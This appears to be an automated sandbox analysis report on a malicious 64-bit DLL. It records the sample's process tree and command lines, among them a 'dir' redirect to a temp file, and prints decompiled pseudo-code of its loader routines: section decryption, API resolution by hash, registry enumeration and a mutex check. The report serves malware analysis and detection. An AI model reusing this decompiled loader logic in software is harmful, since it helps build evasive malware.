Commandline:	rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx
Imagebase:	0x7ff739200000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1716, Parent PID: 5932

General

Target ID:	9
Start time:	10:49:04
Start date:	24/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c "dir" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp
Imagebase:	0x7ff7651b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4248, Parent PID: 1716

General

Target ID:	10
Start time:	10:49:04
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2668, Parent PID: 2512

General

Target ID:	11
Start time:	10:49:07
Start date:	24/11/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk
Imagebase:	0x7ff739200000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll64.exePID: 2512, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25.1%
Total number of Nodes:	1028
Total number of Limit Nodes:	15

Executed Functions

Function 000000018000508C Relevance: 18.2, APIs: 12, Instructions: 241
memoryregistrythreadCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t55;
				long _t57;
				void* _t65;
				void* _t114;
				void* _t115;
				long long* _t146;
				void* _t147;
				void* _t153;
				int _t188;
				long long _t189;
				int _t191;
				long long _t192;
				struct _CRITICAL_SECTION* _t198;
				void* _t201;
				void* _t202;
				signed short* _t211;
				void* _t214;
				void* _t215;
				long long _t216;
				void* _t217;
				long _t219;
				long _t223;
				void* _t225;

				_t154 = __rbx;
				_t146 = __rax;
				_t115 = __esi;
				 *((long long*)(_t201 + 0x20)) = __rbx;
				 *((long long*)(_t201 + 8)) = __rcx;
				_t202 = _t201 - 0x230;
				_t199 =  *0x8000d4a0;
				r14d =  *0x8000d498;
				HeapAlloc(_t225, _t223, _t219);
				r12d = 0;
				_t189 = __rax;
				if (__rax == _t217) goto 0x80005419;
				memset(_t217, _t188, _t191);
				InitializeCriticalSection(_t198);
				_t5 = _t189 + 0x98; // 0x98
				_t216 = _t5;
				 *_t216 = _t216;
				 *((long long*)(__rax + 0xa0)) = _t216;
				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
				E00000001180007678(__ecx, __rax, _t154, _t191);
				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t146 == _t217) goto 0x80005144;
				r9d = 0;
				r8d = 0;
				 *_t146();
				goto 0x80005147;
				_t147 = _t217;
				 *(_t189 + 0x28) = _t147;
				if (_t147 != _t217) goto 0x8000515b;
				GetLastError();
				goto 0x80005408;
				r8d = 0x1102;
				HeapAlloc(??, ??, ??);
				_t192 =  *0x8000d4a0;
				if (_t192 == _t217) goto 0x80005226;
				 *_t192 = r12w; // executed
				_t55 = RegOpenKeyW(??, ??, ??); // executed
				if (_t55 != r12d) goto 0x80005216;
				goto 0x800051cf;
				r12d = r12d + 1;
				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
				r9d = 0x104; // executed
				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
				if (_t57 == 0) goto 0x800051b6;
				r12d = 0;
				if (_t57 != 0x103) goto 0x80005203;
				 *0x8000d480 = _t192;
				RegCloseKey(??); // executed
				if (r12d == r12d) goto 0x80005234;
				HeapFree(??, ??, ??);
				goto 0x8000522b;
				if (8 != r12d) goto 0x8000540f;
				_t193 =  *0x8000d490;
				r8d = 8;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
				_t28 = _t189 + 8; // 0x8
				_t186 = _t28;
				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
				 *((long long*)(_t189 + 0x30)) = 0x180000000;
				if (0x180000000 == _t217) goto 0x800052e2;
				_t30 = _t189 + 8; // 0x8
				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
				 *((long long*)(_t189 + 0x38)) = 0x180000000;
				_t90 =  !=  ? r12d : 8;
				_t132 = ( !=  ? r12d : 8) - r12d;
				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
				goto 0x8000540f;
				_t211 =  *0x8000d490 + 0x18000f000;
				r9d = _t211[1] & 0x0000ffff;
				r11d =  *_t211 & 0x0000ffff;
				_t215 = __r9 + 8;
				if (_t216 - _t215 <= 0) goto 0x80005339;
				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
				goto 0x8000533c;
				if (_t217 != _t217) goto 0x8000534b;
				goto 0x8000540f;
				r14d = r14d ^ 0xecb028fc;
				if (_t216 - _t215 <= 0) goto 0x8000536e;
				if (r14d == r12d) goto 0x80005371;
				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
				goto 0x80005371;
				_t153 = _t217;
				if (_t153 == _t217) goto 0x80005341;
				 *(_t189 + 0x40) = _t211;
				 *0x8000d488 = _t189;
				GetModuleHandleA(??);
				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t153 == _t217) goto 0x800053be;
				r8d = GetCurrentThreadId();
				 *_t153();
				goto 0x800053c1;
				if (_t217 == _t217) goto 0x80005150;
				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
				if (_t153 == _t217) goto 0x800053ee;
				 *_t153();
				goto 0x800053f1;
				if (r12d != r12d) goto 0x8000541e;
				goto 0x80005150;
				asm("lock add dword [ebp+0x38], 0x1");
				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
				E00000001180005578(_t154, _t189, _t217);
				goto 0x8000541e;
				return 8;
			}

0x18000508c
0x18000508c
0x18000508c
0x18000508c
0x180005091
0x1800050a1
0x1800050a8
0x1800050b6
0x1800050cb
0x1800050d1
0x1800050d4
0x1800050da
0x1800050e8
0x1800050f1
0x1800050f7
0x1800050f7
0x1800050fe
0x180005101
0x180005112
0x18000511b
0x180005129
0x180005131
0x180005138
0x18000513b
0x180005140
0x180005142
0x180005144
0x180005147
0x18000514e
0x180005150
0x180005156
0x180005164
0x180005171
0x180005177
0x180005184
0x1800051a1
0x1800051a5
0x1800051b0
0x1800051b4
0x1800051be
0x1800051ca
0x1800051dc
0x1800051e2
0x1800051ec
0x1800051ee
0x1800051f7
0x1800051f9
0x18000520b
0x180005214
0x18000521e
0x180005224
0x18000522e
0x180005234
0x180005248
0x18000524e
0x18000526d
0x180005280
0x18000529f
0x1800052a5
0x1800052a5
0x1800052b6
0x1800052c0
0x1800052c5
0x1800052cc
0x1800052ce
0x1800052d2
0x1800052da
0x1800052de
0x1800052e2
0x1800052e5
0x1800052f6
0x1800052fd
0x180005302
0x18000530d
0x180005312
0x18000531c
0x180005323
0x18000532d
0x180005332
0x180005337
0x18000533f
0x180005346
0x18000534b
0x180005355
0x18000535f
0x180005367
0x18000536c
0x18000536e
0x180005374
0x180005378
0x18000537c
0x180005383
0x180005391
0x18000539c
0x1800053a7
0x1800053b4
0x1800053b7
0x1800053bc
0x1800053c4
0x1800053d3
0x1800053db
0x1800053ea
0x1800053ec
0x1800053f4
0x1800053f6
0x1800053fb
0x18000540d
0x180005412
0x180005417
0x18000543a

APIs

HeapAlloc.KERNEL32 ref: 00000001800050CB
memset.NTDLL ref: 00000001800050E8
InitializeCriticalSection.KERNEL32 ref: 00000001800050F1

Part of subcall function 0000000180008B44: GetModuleHandleA.KERNEL32(?,?,00000000,000000018000510D), ref: 0000000180008B6B
Part of subcall function 0000000180008B44: GetModuleHandleA.KERNEL32(?,?,00000000,000000018000510D), ref: 0000000180008B8B

Part of subcall function 0000000180007678: GetModuleHandleA.KERNEL32 ref: 00000001800076C7

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

GetLastError.KERNEL32 ref: 0000000180005150
HeapAlloc.KERNEL32 ref: 0000000180005171
RegOpenKeyW.ADVAPI32 ref: 00000001800051A5
RegEnumKeyW.ADVAPI32 ref: 00000001800051E2
RegCloseKey.KERNELBASE ref: 000000018000520B
HeapFree.KERNEL32 ref: 000000018000521E
memcpy.NTDLL ref: 000000018000524E
GetModuleHandleA.KERNEL32 ref: 0000000180005383
GetCurrentThreadId.KERNEL32 ref: 00000001800053A9

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenSectionThreadmemcpymemset
String ID:
API String ID: 2014251338-0
Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005CA4 Relevance: 7.6, APIs: 5, Instructions: 88
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

CreateFileW.KERNELBASE ref: 0000000180005D04
RtlInitUnicodeString.NTDLL ref: 0000000180005D20
NtQueryDirectoryFile.NTDLL ref: 0000000180005D8C
CloseHandle.KERNEL32 ref: 0000000180005DC5
GetLastError.KERNEL32 ref: 0000000180005DCD

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
String ID:
API String ID: 2375947951-0
Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004F1C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t46;
				long long _t56;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr* _t76;
				long long _t80;
				long long _t82;
				void* _t83;
				long long _t85;
				void* _t91;
				void* _t92;
				long _t93;
				long _t95;
				long _t97;

				_t92 = __r11;
				_t56 = _t85;
				 *((long long*)(_t56 + 8)) = __rbx;
				 *((long long*)(_t56 + 0x10)) = _t82;
				 *((long long*)(_t56 + 0x18)) = __rsi;
				 *((long long*)(_t56 + 0x20)) = __rdi;
				_t83 = __rcx;
				r8d = 0;
				HeapCreate(_t97, _t95, _t93); // executed
				_t80 = _t56;
				if (_t56 == 0) goto 0x8000506b;
				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
				_t75 = _t56 + _t72 + 0x68;
				_t22 =  *_t75;
				if (_t22 == 0) goto 0x80004ffc;
				if (_t22 == 0x7373622e) goto 0x80004f8a;
				_t76 = _t75 + 0x28;
				_t23 =  *_t76;
				if (_t23 != 0) goto 0x80004f79;
				if (_t23 == 0) goto 0x80004ffc;
				r13d =  *(_t76 + 0x10);
				r12d =  *(_t76 + 0x14);
				r12d = r12d ^  *(_t72 + 8);
				r12d = r12d ^ r13d;
				HeapAlloc(??, ??, ??);
				if (_t56 == 0) goto 0x80004ff5;
				r9d = r12d;
				r8d = r13d;
				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
				r11d =  *((intOrPtr*)(_t76 + 0xc));
				 *0x8000d490 = _t56 - _t92 - _t83;
				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
				goto 0x80005001;
				goto 0x80005001;
				if (2 == 0) goto 0x80005010;
				HeapDestroy(??);
				goto 0x8000506b;
				HeapAlloc(??, ??, ??);
				if (0x80011040 != 0) goto 0x80005049;
				HeapDestroy(??);
				goto 0x8000506b;
				0x8000236a();
				 *0x180011048 = _t80;
				 *0x8000d4a0 = 0x80011040;
				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
			}

0x180004f1c
0x180004f1c
0x180004f1f
0x180004f23
0x180004f27
0x180004f2b
0x180004f39
0x180004f3c
0x180004f4b
0x180004f51
0x180004f57
0x180004f63
0x180004f6a
0x180004f6f
0x180004f73
0x180004f7e
0x180004f80
0x180004f84
0x180004f88
0x180004f8c
0x180004f8e
0x180004f92
0x180004f99
0x180004fa2
0x180004fa5
0x180004fb1
0x180004fb6
0x180004fb9
0x180004fc2
0x180004fc7
0x180004fdd
0x180004fed
0x180004ff3
0x180004ffa
0x180005003
0x180005008
0x18000500e
0x18000502b
0x180005037
0x18000503c
0x180005047
0x180005051
0x180005059
0x18000505d
0x18000508b

APIs

HeapCreate.KERNELBASE(?,?,?,000000018000134F), ref: 0000000180004F4B
HeapAlloc.KERNEL32(?,?,?,000000018000134F), ref: 0000000180004FA5
HeapDestroy.KERNEL32(?,?,?,000000018000134F), ref: 0000000180005008
HeapAlloc.KERNEL32(?,?,?,000000018000134F), ref: 000000018000502B
HeapDestroy.KERNEL32(?,?,?,000000018000134F), ref: 000000018000503C

Strings

.bss, xrefs: 0000000180004F79

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$AllocDestroy$Create
String ID: .bss
API String ID: 388876957-3890483948
Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008708 Relevance: 6.1, APIs: 4, Instructions: 70
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
				void* _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				void* _t45;
				long long _t46;
				long long _t47;
				struct _SECURITY_ATTRIBUTES* _t57;
				long long _t60;
				int _t62;
				WCHAR* _t66;
				void* _t69;
				void* _t76;
				void* _t79;

				_t47 = __rbx;
				_t45 = _t69;
				 *((long long*)(_t45 + 8)) = __rbx;
				r9d = 0;
				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
				 *((intOrPtr*)(_t45 - 0x38)) = 0;
				0x800085dc(); // executed
				if (__eax == 0) goto 0x800087f7;
				_a16 =  *__rcx;
				_t46 =  &_a24;
				r9d = 0;
				_v88 = _t46;
				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
				if (_t46 == _t47) goto 0x800087f7;
				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t46 == _t47) goto 0x800087c0;
				CreateMutexW(_t57, _t62, _t66); // executed
				goto 0x800087c3;
				_t60 = _t47;
				if (_t60 == _t47) goto 0x800087e9;
				if (GetLastError() != 0xb7) goto 0x800087e0;
				FindCloseChangeNotification(??); // executed
				goto 0x800087e9;
				_a24 = _t60;
				HeapFree(??, ??, ??);
				return 1;
			}

0x180008708
0x180008708
0x18000870b
0x180008747
0x18000874a
0x180008751
0x180008754
0x18000875b
0x18000876f
0x180008776
0x180008786
0x180008789
0x18000878e
0x180008799
0x1800087a4
0x1800087ac
0x1800087b9
0x1800087be
0x1800087c0
0x1800087c6
0x1800087d3
0x1800087d8
0x1800087de
0x1800087e0
0x1800087f1
0x18000880c

APIs

Part of subcall function 00000001800030C8: lstrlenW.KERNEL32(?,?,?,0000000180008793), ref: 000000018000310D
Part of subcall function 00000001800030C8: HeapAlloc.KERNEL32(?,?,?,0000000180008793), ref: 0000000180003126
Part of subcall function 00000001800030C8: memcpy.NTDLL ref: 000000018000314B
Part of subcall function 00000001800030C8: memcpy.NTDLL ref: 000000018000317D

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

CreateMutexW.KERNELBASE ref: 00000001800087B9
GetLastError.KERNEL32 ref: 00000001800087C8
FindCloseChangeNotification.KERNELBASE ref: 00000001800087D8
HeapFree.KERNEL32 ref: 00000001800087F1

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: ErrorHeapLastmemcpy$AllocChangeCloseCreateFindFreeMutexNotificationlstrlen
String ID:
API String ID: 4170216436-0
Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007B94 Relevance: 4.6, APIs: 3, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: AllocateHeapmemset
String ID:
API String ID: 669713250-0
Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002464 Relevance: 4.5, APIs: 3, Instructions: 30
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
				long long _t20;
				void* _t24;
				void* _t31;
				void* _t32;

				_a8 = __rbx;
				_a16 = __rsi;
				LoadLibraryA(??); // executed
				_t24 = __rax;
				if (__rax == 0) goto 0x800024af;
				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
				_t20 = _a24;
				 *_t20 = _t24;
				 *__rdx = _t20;
				goto 0x800024b7;
				FreeLibrary(??);
				goto 0x800024b7;
				return GetLastError();
			}

0x180002464
0x180002469
0x180002476
0x18000247c
0x180002482
0x180002495
0x180002497
0x18000249c
0x18000249f
0x1800024a2
0x1800024a7
0x1800024ad
0x1800024c8

APIs

LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF

Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35

FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Library$AllocateErrorFreeHeapLastLoadmemset
String ID:
API String ID: 105124555-0
Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006DCC Relevance: 3.8, APIs: 3, Instructions: 62
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
				int _t27;
				void* _t46;
				long long _t48;
				intOrPtr* _t63;
				long long _t65;
				intOrPtr* _t66;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t74;
				WCHAR* _t77;
				WCHAR* _t80;

				_t48 = __rbx;
				_t46 = _t68;
				 *((long long*)(_t46 + 8)) = __rbx;
				 *((long long*)(_t46 + 0x10)) = _t65;
				 *((long long*)(_t46 + 0x18)) = __rsi;
				 *((long long*)(_t46 + 0x20)) = __rdi;
				_t69 = _t68 - 0x30;
				_t63 = __rcx;
				_t66 = __rdx;
				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
				 *_t66 =  *_t63;
				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
				_t27 = lstrcmpiW(_t77); // executed
				if (_t27 == 0) goto 0x80006e7a;
				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
				r11d =  *((intOrPtr*)(_t69 + 0x20));
				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
				HeapFree(??, ??, ??);
				goto 0x80006e8f;
				return 8;
			}

0x180006dcc
0x180006dcc
0x180006dcf
0x180006dd3
0x180006dd7
0x180006ddb
0x180006de5
0x180006df7
0x180006dfe
0x180006e12
0x180006e1f
0x180006e24
0x180006e36
0x180006e45
0x180006e4d
0x180006e59
0x180006e5e
0x180006e6e
0x180006e77
0x180006e82
0x180006e88
0x180006eaf

APIs

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$AllocFreelstrcmpilstrlen
String ID:
API String ID: 727816722-0
Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 000001FF41C23EDC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R, xrefs: 000001FF41C24064

